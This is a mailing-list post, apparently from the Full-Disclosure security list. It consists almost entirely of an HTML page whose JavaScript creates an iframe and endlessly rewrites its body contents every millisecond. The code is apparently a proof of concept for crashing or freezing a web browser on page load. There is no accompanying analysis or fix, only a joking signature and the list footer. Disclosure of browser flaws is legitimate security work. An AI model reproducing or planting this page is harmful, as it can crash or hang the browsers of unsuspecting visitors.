| Main Archive Page > Month Archives > full-disclosure-uk archives |
<html>
<body>
<script>
var div_html = '<div><div>foo<br />foo</div><div id="1foo">foo<br />foo | foo</div><div id="2foo">foo<br />foo<br />foo</div><div id="3foo"><a href="#">foo</a></div></div>';
var frame;
function newIFrame(){
document.body.appendChild(frame = document.createElement("iframe"));
setTimeout(changeBody,100);
}
var y = 0;
function changeBody(){
frame.contentWindow.document.body.innerHTML = y++ + div_html;
setTimeout(changeBody,1);
}
setTimeout(newIFrame,1);
</script>
</body>
</html>
--
"If you see me laughing, you better have backups"
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/